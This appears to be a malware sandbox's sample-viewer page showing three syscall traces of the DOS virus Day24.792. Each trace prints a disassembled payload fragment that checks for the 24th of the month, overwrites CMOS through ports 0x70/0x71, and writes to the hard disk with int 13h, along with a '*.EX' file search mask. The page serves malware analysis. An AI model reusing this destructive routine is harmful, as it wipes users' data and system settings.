Sample viewer

vx.netlux.org/Virus.DOS.Day24.792

Time	Syscall Op	Syscall Name
2018-12-17T22:49:27.771564923Z	26	PC: 13e8a \| Set disk transfer address
2018-12-17T22:49:27.7737801Z	53	PC: 13e8f \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:49:27.776140397Z	37	PC: 13e99 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:49:27.777785873Z	42	PC: 13c11 \| Get date 0x13c11: cmp dl, 0x18 0x13c14: jne 0x13c37 0x13c16: test dh, 1 0x13c19: jne 0x13c37 0x13c1b: xor ax, ax 0x13c1d: out 0x70, al 0x13c1f: xchg ah, al 0x13c21: out 0x71, al 0x13c23: xchg ah, al 0x13c25: inc al 0x13c27: jne 0x13c1d 0x13c29: mov ax, 0x380 0x13c2c: mov dx, 0x80 0x13c2f: mov cx, 1 0x13c32: mov bx, 0 0x13c35: int 0x13 0x13c37: ret 0x13c38: mov di, word ptr [0x3b7] 0x13c3c: mov word ptr [di + 2], 0x5845 0x13c41: mov word ptr [di], 0x2e2a
2018-12-17T22:49:27.781249142Z	79	PC: 13c4c \| Find next file
2018-12-17T22:49:27.785300374Z	79	PC: 13c4c \| Find next file
2018-12-17T22:49:27.787626366Z	37	PC: 13ebd \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:49:27.789258947Z	26	PC: 13ec5 \| Set disk transfer address
2018-12-17T22:49:27.791823861Z	9	PC: 13bc2 \| Display string (Could not find end pointer)
2018-12-17T22:49:27.796780946Z	76	PC: 13bc8 \| Terminate with return code (Return code = '0')

Time	Syscall Op	Syscall Name
2018-12-25T12:24:00.699029079Z	26	PC: 13e8a \| Set disk transfer address
2018-12-25T12:24:00.70048614Z	53	PC: 13e8f \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:24:00.701883276Z	37	PC: 13e99 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:24:00.702902891Z	42	PC: 13c11 \| Get date 0x13c11: cmp dl, 0x18 0x13c14: jne 0x13c37 0x13c16: test dh, 1 0x13c19: jne 0x13c37 0x13c1b: xor ax, ax 0x13c1d: out 0x70, al 0x13c1f: xchg ah, al 0x13c21: out 0x71, al 0x13c23: xchg ah, al 0x13c25: inc al 0x13c27: jne 0x13c1d 0x13c29: mov ax, 0x380 0x13c2c: mov dx, 0x80 0x13c2f: mov cx, 1 0x13c32: mov bx, 0 0x13c35: int 0x13 0x13c37: ret 0x13c38: mov di, word ptr [0x3b7] 0x13c3c: mov word ptr [di + 2], 0x5845 0x13c41: mov word ptr [di], 0x2e2a
2018-12-25T12:24:00.70532506Z	79	PC: 13c4c \| Find next file
2018-12-25T12:24:00.706985945Z	79	PC: 13c4c \| Find next file (See above)
2018-12-25T12:24:00.708153937Z	37	PC: 13ebd \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:24:00.709575997Z	26	PC: 13ec5 \| Set disk transfer address
2018-12-25T12:24:00.710831093Z	9	PC: 13bc2 \| Display string (Could not find end pointer)
2018-12-25T12:24:00.71642148Z	76	PC: 13bc8 \| Terminate with return code (Return code = '0')

Time	Syscall Op	Syscall Name
2018-12-25T12:24:01.358565598Z	26	PC: 13e8a \| Set disk transfer address
2018-12-25T12:24:01.360811531Z	53	PC: 13e8f \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:24:01.362223117Z	37	PC: 13e99 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:24:01.363359592Z	42	PC: 13c11 \| Get date 0x13c11: cmp dl, 0x18 0x13c14: jne 0x13c37 0x13c16: test dh, 1 0x13c19: jne 0x13c37 0x13c1b: xor ax, ax 0x13c1d: out 0x70, al 0x13c1f: xchg ah, al 0x13c21: out 0x71, al 0x13c23: xchg ah, al 0x13c25: inc al 0x13c27: jne 0x13c1d 0x13c29: mov ax, 0x380 0x13c2c: mov dx, 0x80 0x13c2f: mov cx, 1 0x13c32: mov bx, 0 0x13c35: int 0x13 0x13c37: ret 0x13c38: mov di, word ptr [0x3b7] 0x13c3c: mov word ptr [di + 2], 0x5845 0x13c41: mov word ptr [di], 0x2e2a
2018-12-25T12:24:01.366586623Z	79	PC: 13c4c \| Find next file
2018-12-25T12:24:01.368962549Z	79	PC: 13c4c \| Find next file (See above)
2018-12-25T12:24:01.370956698Z	37	PC: 13ebd \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:24:01.373023169Z	26	PC: 13ec5 \| Set disk transfer address
2018-12-25T12:24:01.374293401Z	9	PC: 13bc2 \| Display string (Could not find end pointer)
2018-12-25T12:24:01.377566604Z	76	PC: 13bc8 \| Terminate with return code (Return code = '0')